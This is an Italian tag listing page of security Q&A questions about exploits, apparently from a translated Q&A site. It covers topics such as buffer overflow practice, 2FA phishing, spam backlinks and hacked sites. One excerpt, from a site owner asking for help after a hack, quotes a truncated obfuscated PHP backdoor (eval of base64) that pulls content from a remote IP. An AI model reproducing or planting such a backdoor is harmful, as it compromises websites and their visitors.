Domande con tag 'exploit'

0
risposte

exploit che circolano Facebook con un file .pnh incorporato in un tag img

Non sai per quanto tempo questo link sarà attivo, ma questa è la pagina in cui gli utenti vengono reindirizzati dopo aver provato a leggere un post di notizie false in una cronologia di qualcuno. [AVVISO: ACCESSO IN UN AMBIENTE CONTROLLATO]...
posta 06.07.2014 - 08:35
1
risposta

Risorse per conoscere lo sfruttamento dei sistemi Windows [chiuso]

Sono un principiante nei test di penetrazione e sto lottando per trovare materiale decente da imparare. Ho usato libri su nmap, Metasploit, sfruttare la scrittura ecc ..., ma contenevano troppe informazioni su troppi SO. Voglio qualcosa di speci...
posta 10.03.2015 - 16:08
1
risposta

Come disabilitare NX su Linux

Sto imparando lo sfruttamento dell'overflow del buffer dello stack e in seguito ho postato domanda Errore di segmentazione del codice shell a proposito dell'esecuzione dello shellcode dal programma di test o quando viene iniettato in un progra...
posta 15.12.2018 - 19:15
0
risposte

Che cos'è l'exploit SPL? [chiuso]

Recentemente ho lavorato a un progetto web che utilizza Javascript e PHP per caricare il suo contenuto dall'API di flickr. Ho continuato a mostrare questa immagine e scomparire immediatamente durante i primi 2 o 3 secondi del caricamento dell...
posta 19.03.2013 - 10:37
3
risposte

Enorme quantità di backlink di porno nascosto da siti legittimi di WordPress, perché l'hanno fatto?

Stavo facendo qualche ricerca sul backlink e ho trovato un'enorme quantità di siti Web legittimi collegati al sito che stavo ricercando. Il problema era che il testo di ancoraggio di tutti i link in cui termini correlati al porno .... Ho st...
posta 29.07.2017 - 12:16
0
risposte

Case Studies di hack di alto profilo [chiuso]

Ogni hack si verifica a causa di una forma di vulnerabilità della sicurezza o di un'altra, e ritengo che il modo migliore per evitare / correggere queste vulnerabilità è conoscerle. Ci sono ovunque su internet dove posso trovare case study di...
posta 23.01.2015 - 10:50
5
risposte

Sito backdoor & eval ()

Gestisco un sito Joomla 1.7 che è stato hackerato oggi. Sotto lo script ha fatto il trucco. eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSF...
posta 21.02.2013 - 10:54
2
risposte

Perché preoccuparsi di certi tipi di 2fa se possono essere facilmente aggirati?

In the wild, esiste un metodo per aggirare 2fa. L'essenza di ciò è che l'hacker non solo phish la password, ma anche phishing il secondo fattore e usa quelli per un vero login sulla propria macchina. (descritto in dettaglio qui link ). In quest...
posta 06.09.2018 - 19:01
3
risposte

Come un hacker professionista penetrerebbe in un computer in una rete? [chiuso]

Quali tipi di vulnerabilità o falle nella sicurezza che un hacker potrebbe utilizzare per penetrare e prendere il controllo di un computer in una rete, come un normale PC in una rete predefinita (Wireless-LAN). Spesso sento che il computer di...
posta 23.07.2016 - 14:21
5
risposte

Come analizzare gli URL di e-mail di spam per rilevare gli exploit?

Ricevo email di spam che, guardando le intestazioni delle email, sembrano provenire da una varietà di computer in tutto il mondo. Sono sempre lo stesso tipo di email che contiene URL non validi all'interno dei tag HTML IMG. Ho impostato Thunderb...
posta 20.02.2015 - 16:42